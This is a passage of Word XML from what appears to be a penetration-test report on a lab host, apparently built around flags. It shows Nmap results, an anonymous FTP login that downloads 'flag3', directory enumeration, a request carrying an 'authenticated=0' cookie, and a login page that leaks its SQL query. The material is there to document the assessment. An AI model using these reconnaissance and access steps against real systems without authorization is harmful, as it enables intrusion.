          <w:p w14:paraId="7DDDF9E8" w14:textId="67906226" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>80/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">   open   http       Apache httpd 2.4.29 ((Ubuntu))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="721DC1FA" w14:textId="77F0C89E" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>443/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">  open</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">        OpenSSH 7.6p1 Ubuntu (Ubuntu Linux; protocol 2.0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AA78017" w14:textId="77777777" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>8001/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> open   http       Apache httpd 2.4.29 ((Ubuntu))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CF40917" w14:textId="77777777" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>8080/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> closed http-proxy</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="690DADE4" w14:textId="77777777" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>9001/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> open   ftp        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 3.0.3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648635CC" w14:textId="77777777" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Device type: general purpose</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCAB079" w14:textId="77777777" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Running: Linux </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>3.X|4.X</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="79E0D1DE" w14:textId="77777777" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OS CPE: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cpe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:/o:linux</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">:linux_kernel:3 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cpe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:/o:linux:linux_kernel:4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40E02F87" w14:textId="77777777" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>OS details: Linux 3.2 - 4.9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="738C2DE0" w14:textId="77777777" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Network Distance: 1 hop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42D6ADE0" w14:textId="63C8D06D" w:rsidR="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Service Info: OSs: Linux, Unix; CPE: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>cpe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>o:linux</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>:linux_kernel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B1D48B8" w14:textId="1ECE5498" w:rsidR="00C528B6" w:rsidRPr="00C528B6" w:rsidRDefault="00C528B6" w:rsidP="00C528B6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C528B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E0324C" w14:textId="7E5F4505" w:rsidR="00E01DB7" w:rsidRPr="00AC67FD" w:rsidRDefault="00C528B6" w:rsidP="00E01DB7">
      <w:r>
        <w:t>The assessment team’s scan results indicated that the FTP service running on 10.10.0.66 may allow anonymous FTP login.</w:t>
      </w:r>
      <w:r w:rsidR="00A26E1B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0041691D">
        <w:t xml:space="preserve">The Hyperthetical team connected to the FTP server and was able to login with the username </w:t>
      </w:r>
      <w:r w:rsidR="0041691D" w:rsidRPr="00E01DB7">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>anonymous</w:t>
      </w:r>
      <w:r w:rsidR="0041691D">
        <w:t xml:space="preserve"> and an arbitrary password string</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0041691D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E01DB7">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E01DB7">
        <w:t xml:space="preserve"> While they were not able to store files or access much outside of the </w:t>
      </w:r>
      <w:r w:rsidR="00E01DB7" w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E01DB7" w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E01DB7" w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00E01DB7">
        <w:t xml:space="preserve"> directory, they used their access to download sensitive information such as </w:t>
      </w:r>
      <w:r w:rsidR="00E01DB7" w:rsidRPr="0056593D">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>flag3</w:t>
      </w:r>
      <w:r w:rsidR="00E01DB7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E01DB7" w14:paraId="66FF62AC" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="6BF6461A" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>ftp 10.10.0.66 -p 9001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61EC51FF" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>Connected to 10.10.0.66.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42129BE6" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>220 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vsFTPd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 3.0.3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EF38E7C" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>Name (</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>10.10.0.66:kali</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>): anonymous</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40AE1346" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>331 Please specify the password.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7126314E" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Password: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="613E651C" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>230 Login successful.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31B9D30A" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Remote</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> system type is UNIX.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40E207BD" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>Using binary mode to transfer files.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21956046" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRPr="00F351BE" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">ftp&gt; cd </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>gibson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="18CDAA5D" w14:textId="77777777" w:rsidR="00A26E1B" w:rsidRDefault="00A26E1B" w:rsidP="00A26E1B">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="791013DF" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rw-rw-rw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">-    1 0        0           46037 Apr </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>03  2020</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> flag3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78D73AFC" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>226 Directory send OK.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73FEC1D1" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ftp&gt; get </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>flag3</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0F5E5AE7" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>local: flag3 remote: flag3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31D1F9A7" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>229 Entering Extended Passive Mode (|||41595|)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F635C2D" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>150 Opening BINARY mode data connection for flag3 (46037 bytes).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01D40264" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>100% |************************************************************************************| 46037       17.89 MiB/s    00:00 ETA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D6C7A37" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>226 Transfer complete.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05995931" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>46037 bytes received in 00:00 (15.24 MiB/s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E795153" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRPr="0056593D" w:rsidRDefault="00E01DB7" w:rsidP="00E01DB7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anonymous FTP Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1635AE27" w14:textId="644F23B4" w:rsidR="00E01DB7" w:rsidRPr="00AC67FD" w:rsidRDefault="00E01DB7" w:rsidP="00E01DB7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The assessment team attempted to access other sensitive files during this time, but the anonymous FTP account did not have the correct permissions.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E01DB7" w14:paraId="46A48EDD" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="05DB2013" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRPr="00F351BE" w:rsidRDefault="00E01DB7" w:rsidP="00E01DB7">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">ftp&gt; ls </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>.backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="426A367E" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="00E01DB7">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>229 Entering Extended Passive Mode (|||23332|)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FB96573" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="00E01DB7">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>150 Here comes the directory listing.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0675D947" w14:textId="77777777" w:rsidR="00E01DB7" w:rsidRPr="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="00E01DB7">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">226 </w:t>
            </w:r>
            <w:r w:rsidRPr="00E01DB7">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>Transfer done (but failed to open directory).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E4420A0" w14:textId="721D2CDE" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="00E01DB7">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>ftp&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32098E20" w14:textId="65C05CCB" w:rsidR="00E01DB7" w:rsidRPr="0056593D" w:rsidRDefault="00E01DB7" w:rsidP="00E01DB7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access Denied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484080B1" w14:textId="59F36A5F" w:rsidR="00E01DB7" w:rsidRDefault="00E01DB7" w:rsidP="00A26E1B">
      <w:r>
        <w:t>Next, the as</w:t>
      </w:r>
      <w:r w:rsidR="00A26E1B">
        <w:t xml:space="preserve">sessors began exploring the web application running on port 80. They started to enumerate directories using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A26E1B" w:rsidRPr="00A26E1B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>Gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A26E1B">
        <w:t xml:space="preserve">. While the automated scans ran, the assessment team explored the site manually. After the assessors attempted to log in to the application through the portal on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A26E1B" w:rsidRPr="00A26E1B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A26E1B">
        <w:t xml:space="preserve">, their requests began to include a cookie called </w:t>
      </w:r>
      <w:r w:rsidR="00A26E1B" w:rsidRPr="00A26E1B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r w:rsidR="00A26E1B">
        <w:t xml:space="preserve"> with a value of </w:t>
      </w:r>
      <w:r w:rsidR="00A26E1B" w:rsidRPr="00A26E1B">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00A26E1B">
        <w:t xml:space="preserve"> in their requests to the application.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A26E1B" w14:paraId="2E3B4D84" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="7A91A01F" w14:textId="77777777" w:rsidR="00A26E1B" w:rsidRDefault="00A26E1B" w:rsidP="00A26E1B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>GET /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login.php?username</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>test&amp;password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>test&amp;Login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=Enter HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FB8BFC6" w14:textId="77777777" w:rsidR="00A26E1B" w:rsidRDefault="00A26E1B" w:rsidP="00A26E1B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Host: 10.10.0.66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA1D8BC" w14:textId="77777777" w:rsidR="00A26E1B" w:rsidRDefault="00A26E1B" w:rsidP="00A26E1B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35047AEA" w14:textId="77777777" w:rsidR="00A26E1B" w:rsidRDefault="00A26E1B" w:rsidP="00BF2359">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>Cookie: authenticated=0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BB58850" w14:textId="07EC3BF4" w:rsidR="00A26E1B" w:rsidRDefault="00A26E1B" w:rsidP="00A26E1B">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34197C86" w14:textId="5D988544" w:rsidR="00A26E1B" w:rsidRPr="0056593D" w:rsidRDefault="00A26E1B" w:rsidP="00A26E1B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authentication Cookie Set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C212EAA" w14:textId="66BBAB97" w:rsidR="000950D9" w:rsidRDefault="000950D9" w:rsidP="00A26E1B">
      <w:r>
        <w:t xml:space="preserve">They also discovered that the login portal returned the SQL command used to look up the user in the application database </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the result of a login failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E28D27B" w14:textId="17D0EA1C" w:rsidR="000950D9" w:rsidRPr="000950D9" w:rsidRDefault="000950D9" w:rsidP="000950D9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000950D9">
        <w:drawing>
